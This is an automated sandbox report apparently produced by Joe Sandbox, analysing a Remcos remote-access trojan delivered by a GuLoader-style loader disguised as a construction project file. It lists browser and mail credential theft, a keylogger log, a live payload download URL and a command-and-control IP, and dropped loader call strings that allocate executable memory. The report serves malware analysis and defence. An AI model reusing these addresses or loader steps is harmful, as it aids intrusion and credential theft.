              Source: Yara matchFile source: 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe PID: 7864, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: ESMTPPassword6_2_004033F0
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword6_2_00402DB3
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword6_2_00402DB3
              Source: Yara matchFile source: Process Memory Space: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe PID: 7864, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe PID: 8064, type: MEMORYSTR

              Remote Access Functionality

              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-UOMZ21Jump to behavior
              Source: Yara matchFile source: 00000004.00000002.2943881499.000000000246B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2942457183.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe PID: 7864, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
              |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
              | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
              | Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 2 Obfuscated Files or Information | 11 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 2 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
              | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 112 Process Injection | 1 Software Packing | 2 Credentials in Registry | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
              | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | 1 Credentials In Files | 228 System Information Discovery | Distributed Component Object Model | 11 Input Capture | 1 Remote Access Software | Traffic Duplication | Data Destruction |
              | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 231 Security Software Discovery | SSH | 2 Clipboard Data | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
              | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | 112 Application Layer Protocol | Data Transfer Size Limits | Service Stop |
              | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 4 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
              | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 112 Process Injection | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
              | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
[Behavior graph. Behavior Graph ID: 1576192; Sample: Ref GEC409876  CONSTRUCTION...; Startdate: 16/12/2024; Architecture: WINDOWS; Score: 100]

Source | Detection | Scanner | Label
Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | 21% | ReversingLabs | Win32.Trojan.NsisInject

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll | 0% | ReversingLabs |

No Antivirus matches
No Antivirus matches

Name | IP | Active | Malicious | Antivirus Detection | Reputation
geoplugin.net | 178.237.33.50 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://66.63.187.30/wBWcspgeBmkxYD199.bin | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp | false | | high

IP | Domain | Country | ASN | ASN Name | Malicious
66.63.187.30 | unknown | United States | 8100 | ASN-QUADRANET-GLOBALUS | false
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
162.251.122.87 | unknown | Canada | 64236 | UNREAL-SERVERSUS | true

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1576192
Start date and time: 2024-12-16 16:17:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 32s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
Detection: MAL
Classification: mal100.phis.troj.spyw.evad.winEXE@9/18@1/3
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 100%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 97%
                                                                                                    • Number of executed functions: 180
                                                                                                    • Number of non-executed functions: 316
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe
                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                    • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                    • VT rate limit hit for: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe

Time | Type | Description
10:19:20 | API Interceptor | 522064x Sleep call for process: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe modified

Match | Associated Sample Name / URL | Detection | Threat Name | Context
66.63.187.30 | Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe | malicious | Remcos, GuLoader | 66.63.187.30/hpVMAPRZVuaX36.bin
178.237.33.50 | Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | givenbestupdatedoingformebestthingswithgreatnewsformegive.hta | malicious | Cobalt Strike, Remcos | geoplugin.net/json.gp
178.237.33.50 | clearentirethingwithbestnoticetheeverythinggooodfrome.hta | malicious | Cobalt Strike, Remcos | geoplugin.net/json.gp
178.237.33.50 | 7Sbq4gMMlp.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | PO_0099822111ORDER.js | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | requests-pdf.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | Documents.pdf | malicious | Remcos, DBatLoader | geoplugin.net/json.gp
178.237.33.50 | x295IO8kqM.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 7d74ApV4bb.exe | malicious | Remcos, DBatLoader | geoplugin.net/json.gp
178.237.33.50 | greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta | malicious | Cobalt Strike, Remcos | geoplugin.net/json.gp

                                                                                                    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                    geoplugin.netPurchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • 178.237.33.50
                                                                                                    givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    7Sbq4gMMlp.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    requests-pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    Documents.pdfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                    • 178.237.33.50
                                                                                                    x295IO8kqM.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    7d74ApV4bb.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                    • 178.237.33.50
                                                                                                    greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                    ASN-QUADRANET-GLOBALUSPurchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • 66.63.187.30
                                                                                                    armv4l.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 204.44.218.122
                                                                                                    rebirth.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                    • 104.223.28.126
                                                                                                    jew.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 72.11.146.73
                                                                                                    2.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 173.205.82.95
                                                                                                    Josho.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 185.228.81.1
                                                                                                    tQoSuhQIdC.msiGet hashmaliciousUnknownBrowse
                                                                                                    • 66.63.187.205
                                                                                                    Ref#60031796.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 69.174.98.48
                                                                                                    gC0jV08bP3.exeGet hashmaliciousMeduza Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                                                                    • 66.63.187.209
                                                                                                    7xweUz2MYa.exeGet hashmaliciousMeduza Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                                                                    • 66.63.187.209
                                                                                                    ATOM86-ASATOM86NLPurchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • 178.237.33.50
                                                                                                    givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    7Sbq4gMMlp.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    requests-pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    Documents.pdfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                    • 178.237.33.50
                                                                                                    x295IO8kqM.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    7d74ApV4bb.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                    • 178.237.33.50
                                                                                                    greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    UNREAL-SERVERSUSPurchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • 162.251.122.87
                                                                                                    WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                                                                                    • 162.251.122.87
                                                                                                    RFQ 008191.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • 212.162.149.89
                                                                                                    purchase.order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                    • 212.162.149.66
                                                                                                    Forhandlingsfriheden.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                    • 212.162.149.66
                                                                                                    order CF08093-24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • 212.162.149.89
                                                                                                    PO. A-72 9234567.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                    • 212.162.149.89
                                                                                                    la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 162.251.123.175
                                                                                                    file.exeGet hashmaliciousRedLineBrowse
                                                                                                    • 212.162.149.48
                                                                                                    https://haqzt.trc20.kcgrocks.com/merchantServicesGet hashmaliciousUnknownBrowse
                                                                                                    • 172.96.10.214
                                                                                                    No context
                                                                                                    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                    C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dllPurchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                      kahyts.exeGet hashmaliciousGuLoaderBrowse
                                                                                                        kahyts.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          https://www.imobie.com/go/download.php?product=atiGet hashmaliciousUnknownBrowse
                                                                                                            Synarmogoidea.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                              Synarmogoidea.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                https://dldir1v6.qq.com/weixin/Windows/WeChatSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                  https://dldir1v6.qq.com/weixin/Windows/WeChatSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                    SecuriteInfo.com.Trojan.Encoder.17199.16872.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      SecuriteInfo.com.Trojan.Encoder.17199.16872.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):144
                                                                                                                        Entropy (8bit):3.365630494294252
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:rhlKlyKIlfUlPNWLlFwb5JWRal2Jl+7R0DAlBG45klovDl6v:6lZ4UlPN1b5YcIeeDAlOWAv
                                                                                                                        MD5:A1626BEEDCEC054D5C7E3D66806D0343
                                                                                                                        SHA1:F7F79C4C30D51D11CF9407DFD56E3606B200B0C4
                                                                                                                        SHA-256:478DC169870626E5D2550644CB271E53B176C3F12B0D73E6C3FB47AA778A619A
                                                                                                                        SHA-512:1DCD0560BC582ADA4E37E3A930BFFCC2F18CE6A8B17458977F1A3C9E8EE62ABEEC2CEE7DDEF1C6379362FE0D3F43C236E569BEE54BA39EFE0EECBF3CFF0806DA
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                        Reputation:low
                                                                                                                        Preview:....[.2.0.2.4./.1.2./.1.6. .1.0.:.1.8.:.4.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:JSON data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):963
                                                                                                                        Entropy (8bit):5.018384957371898
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zz2:qlupdRNuKyGX85jvXhNlT3/7CcVKWro
                                                                                                                        MD5:C9BB4D5FD5C8A01D20EBF8334B62AE54
                                                                                                                        SHA1:D38895F4CBB44CB10B6512A19034F14A2FC40359
                                                                                                                        SHA-256:767218EC255B7E851971A77B773C0ECC59DC0B179ECA46ABCC29047EEE6216AA
                                                                                                                        SHA-512:2D412433053610C0229FB3B73A26C8FB684F0A4AB03A53D0533FDC52D4E9882C25037015ACE7D4A411214AA9FAA780A8D950A83B57B200A877E26D7890977157
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):52
                                                                                                                        Entropy (8bit):4.725996747697686
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:HM/xiXWR0AXQQLQIfLBJXmgxv:HHpQkIP2I
                                                                                                                        MD5:87C38DC6EF4616FF016D1CCC1A793086
                                                                                                                        SHA1:AFC6434AAAD4FB1A250AF0D167DAB718DA10B4AF
                                                                                                                        SHA-256:781C527A7A89FDBFA481BF8800E255DC1B69E47B2B68040DC39103C114E31849
                                                                                                                        SHA-512:CC8EF7D9C98FB663C79A4A00FD68344F7AA3DBA27D68B3AEF463C758A74AEBF8190C8A9532FE91BC7DB32E78FF2C48C43230F03DA226F9A9EF288324EFEBF0FE
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:[Initialize]..First=user32::EnumWindows(i r1 ,i 0)..
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x96ddfe3e, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):20447232
                                                                                                                        Entropy (8bit):1.2830265194886015
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:ZRSPO9ijljKhBfvKDv2Q+555ckQB8WBbXnE:mui9PD7+
                                                                                                                        MD5:2C8CC9D898FAD9B2DCBA2B2A7A6FA65E
                                                                                                                        SHA1:665DAE429E4B4D5FA36EAF5726BFFE6020F33CF0
                                                                                                                        SHA-256:EADDC5772C4404CF0EE2DF98C16E230A8B96CB9BF75C584ABE18031354028DAF
                                                                                                                        SHA-512:41D1BF4ACCD14E95361241F55B30790DEFF0D0C362A75902C09CBE3F561AF69851328821A40AB8279525200BB590547BC80489C185BF67500EAAE1F58C308523
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.40871867207634
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:sEMBQEJkJVEj1/F8dWxQoXUn:eFMWxvUn
                                                                                                                        MD5:DF8379D971F8775D91CD01506F558897
                                                                                                                        SHA1:E28FF2839B7CF171CE3540CB2DE64FA18DB9B12C
                                                                                                                        SHA-256:AE63DA186497C9240A3AF76E8E52198426C3492AA7DCC62E8910405EF981ECEC
                                                                                                                        SHA-512:AC091F635BC253FED0C5C9E516F4E58968033793C66B2EC3E5ED31AA42D63667D85F1661CA6FBE8CFC28AD59B07D903556987C7F79AA59610934C3D6F6F60F02
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:kernel32::VirtualAlloc(i 0,i 12447744, i 0x3000, i 0x40)p.r1
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):56
                                                                                                                        Entropy (8bit):4.206435556800405
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:sAAEVvjsKPo84n:fLxPy
                                                                                                                        MD5:4FF83567CD3F682CB62E957F312F61A0
                                                                                                                        SHA1:5BB6B4B35E74FB335211813B25025166939DDF10
                                                                                                                        SHA-256:9A2382A1EDEDEF09EF70D6DFCEA50BE1594799E518A9F89C111875301539A2AE
                                                                                                                        SHA-512:E7FBB21A2EAEE93F4F607B77476C8605A7233CB16C0EF576FAC05235252C5A0DAB338277749A9A38BABF9163D9D582D481E2A739EBBB578BFB3B813FC36A678E
                                                                                                                        Malicious:false
                                                                                                                        Preview:kernel32::ReadFile(i r5, i r1, i 12447744,*i 0, i 0)i.r3
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1620343
                                                                                                                        Entropy (8bit):3.789633774447586
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:cbARIcif/hP1hvP8SS7YxtlpibBzBVWDT4JxEKepP7:cQIf3NtGCCGDT4TEKeV
                                                                                                                        MD5:6A779D81AD02555D27C1CF02173790DC
                                                                                                                        SHA1:8EFF3725271A9F089592B258B9C762A7C1C6115C
                                                                                                                        SHA-256:DBBC048C6661DB3B6EB749FEE2B523613E8C9F2D977B4A37D73B7677779A200B
                                                                                                                        SHA-512:37A14F024DADE0CC9ACBD97F5D8DCA1E3A8581FFD672822B6EBA0C99B6FB79502A42F138462353AB4AF464CE46E7CB1DB1C0AC702123BDD44B964DD8C27D608C
                                                                                                                        Malicious:false
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):74
                                                                                                                        Entropy (8bit):3.9637832956585757
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:sRQE1wFEt/ijNJyI3dj2+n:aQEGiwh3D
                                                                                                                        MD5:16D513397F3C1F8334E8F3E4FC49828F
                                                                                                                        SHA1:4EE15AFCA81CA6A13AF4E38240099B730D6931F0
                                                                                                                        SHA-256:D3C781A1855C8A70F5ACA88D9E2C92AFFFA80541334731F62CAA9494AA8A0C36
                                                                                                                        SHA-512:4A350B790FDD2FE957E9AB48D5969B217AB19FC7F93F3774F1121A5F140FF9A9EAAA8FA30E06A9EF40AD776E698C2E65A05323C3ADF84271DA1716E75F5183C3
                                                                                                                        Malicious:false
                                                                                                                        Preview:kernel32::CreateFileA(m r4 , i 0x80000000, i 0, p 0, i 4, i 0x80, i 0)i.r5
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):30
                                                                                                                        Entropy (8bit):4.256564762130954
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:DyWgLQIfLBJXmgU:mkIP25
                                                                                                                        MD5:F15BFDEBB2DF02D02C8491BDE1B4E9BD
                                                                                                                        SHA1:93BD46F57C3316C27CAD2605DDF81D6C0BDE9301
